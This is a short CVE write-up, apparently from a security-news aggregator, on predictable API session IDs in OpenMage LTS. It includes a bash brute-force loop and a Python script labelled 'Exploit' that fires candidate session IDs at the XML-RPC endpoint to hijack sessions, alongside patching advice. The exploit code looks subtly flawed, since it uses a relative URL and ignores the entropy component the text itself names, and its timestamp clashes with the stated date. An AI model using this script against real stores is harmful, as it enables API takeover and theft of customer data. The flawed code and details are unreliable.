Listen to this Post
How the CVE works (around 20 lines):
The vulnerability exists in `Mage_Api_Model_Session::start()` where the API session ID is generated as md5(time() . uniqid('', true)). No cryptographically secure random function is used. All inputs to the MD5 hash are derived from the current Unix timestamp (seconds), a microsecond-based prefix from uniqid(), and a predictable LCG float suffix. The `$sessionName` parameter is never passed, making the hash entirely dependent on time and process state. Because the timestamp is known to the attacker (e.g., via network timing), unique microsecond values are observable within a one-second window. The LCG entropy is limited to the PID hash and can be brute-forced offline. This violates OWASP ASVS v4 requiring ≥64 bits of entropy and NIST SP 800-63B. An attacker can record the victim’s login second, generate a candidate pool of MD5 hashes by varying the microsecond and LCG seed, then send high‑concurrency HTTP requests to the XML‑RPC endpoint. No rate limiting on `/api/xmlrpc/` allows thousands of attempts per second. A successful candidate returns a valid session ID, granting full API access. Live evidence from OpenMage 20.16.0 shows five distinct session IDs generated within the same second. The only unknown is the LCG float, which is seeded deterministically from getpid() ^ time(). The same vulnerable logic affects SOAP v1/v2 and legacy REST endpoints.
dailycve form:
Platform: OpenMage LTS
Version: ≤ 20.16.0
Vulnerability: Weak session entropy
Severity: Critical
date: 2025-05-06
Prediction: Patch within 14 days
What Undercode Say:
Simulate entropy exhaustion with time offsets
for sec in {0..1}; do
for usec in {464631..600118..1000}; do
uid=$(printf '%08x%05x' $((1775817593+sec)) $((usec/10)))
echo -n "$((1775817593+sec))$uid" | md5sum
done
done | sort | uniq -c
Check if CSPRNG is used in patched version
grep -n "random_bytes" app/code/core/Mage/Api/Model/Session.php
Exploit:
import hashlib, requests
observed_sec = 1775817593
candidates = []
for usec in range(464000, 601000, 500):
uid = f"{observed_sec:08x}{usec//10:05x}"
candidates.append(hashlib.md5(f"{observed_sec}{uid}".encode()).hexdigest())
for sid in candidates:
r = requests.post("/api/xmlrpc/", data=f"<methodCall><methodName>magento.info</methodName><params><param><value><string>{sid}</string></value></param></params></methodCall>")
if "faultCode" not in r.text:
print(f"Hijacked: {sid}")
break
Protection from this CVE:
Replace `md5(time() . uniqid(”, true))` with `bin2hex(random_bytes(32))` in start(). Enforce API rate limiting (e.g., 5 requests/sec per IP). Disable legacy XML‑RPC/SOAP if unused. Upgrade to OpenMage LTS > 20.16.0 once patch released.
Impact:
Full API takeover – read/write products, customer PII, orders, inventory. Leads to data exfiltration, fraudulent orders, price manipulation, and supply chain compromise. No authentication bypass required; attacker only needs victim’s login timestamp.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
